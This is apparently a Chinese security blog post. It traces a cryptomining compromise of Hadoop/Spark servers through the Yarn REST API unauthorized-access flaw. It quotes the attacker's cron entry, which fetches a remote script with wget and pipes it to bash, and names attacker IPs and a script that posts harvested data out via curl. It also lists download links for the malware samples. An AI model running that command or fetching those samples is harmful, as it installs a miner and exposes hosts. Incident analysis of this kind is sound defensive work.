一次针对挖矿攻击溯源概述

  • A+
所属分类:安全文章

排查

某天多台机器cpu100%,疑似中了挖矿程序,在检测过程当中发现,外连了

tcp        0      0 xxx.xxx.xxx:56208       94.23.41.130:80         ESTABLISHED 48630/systemd --use


还有连接至37.59.43.131


但是查看进程却又发现/tmp/systemd该文件被删除了。

一次针对挖矿攻击溯源概述


后来在yarn用户上发现被写入定时任务

33 * * * * wget -qO- -U- hxxps://ddgsdk6oou6znsdn.tor2web.io/i.sh|bash || wget -qO- -U- hxxps://ddgsdk6oou6znsdn.onion.guide/i.sh|bash

……

每小时的第33分钟会执行一次


还有在日志上发现有大量的操作记录

一次针对挖矿攻击溯源概述



网上搜索有关yarn近期漏洞,发现攻击者疑似利用了“Hadoop Yarn REST API 未授权漏洞”进行入侵。


与腾讯云鼎实验室提供的攻击流程图很像

一次针对挖矿攻击溯源概述

随后为避免在内网机器上再次触发,到自己机器上执行了下命令

一次针对挖矿攻击溯源概述


发现该脚本会先把xmr、miner等kill掉,之后会检测/tmp/.X11-lock,建立文件

一次针对挖矿攻击溯源概述

由于取消操作较快没有让他及时删除该文件,它还会判断一层你的内核版本是多少,之后下载对应内核版本的二进制文件。


文件存储/tmp/下,ls -la查看该隐藏文件

一次针对挖矿攻击溯源概述

分析该二进制文件(后续结果丢失)


之后排查机器小于5kb的jar文件,发现Application.jar、SimpleApp.jar的文件

1、Application.jar

一次针对挖矿攻击溯源概述


下述是SimpleApp.jar

一次针对挖矿攻击溯源概述


解包查看

一次针对挖矿攻击溯源概述


将base64解码后得到

一次针对挖矿攻击溯源概述

初步判断它会对spark集群机器分发该SimpleApp.jar文件,去执行这条命令。


后续发现hxxp://176.119.28.11/b/z/ 目录存在大量被攻击机器ip

一次针对挖矿攻击溯源概述


点击查看其中某台机器的信息

一次针对挖矿攻击溯源概述


通过spark任务下载Application.jar,同时发现含有攻击者操作等脚本

一次针对挖矿攻击溯源概述


发现执行y.sh会把它写入tmp.txt文件之后再利用curl post到re.php当中,随即删除该文件。

一次针对挖矿攻击溯源概述


样本:

https://malwr3chij47327q.onion.plus/SimpleApp.jar

https://httpsxztdjm2vrpw.onion.plus/SimpleApp.jar

http://176.119.28.11/y.sh


本文始发于微信公众号(逢人斗智斗勇):一次针对挖矿攻击溯源概述

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: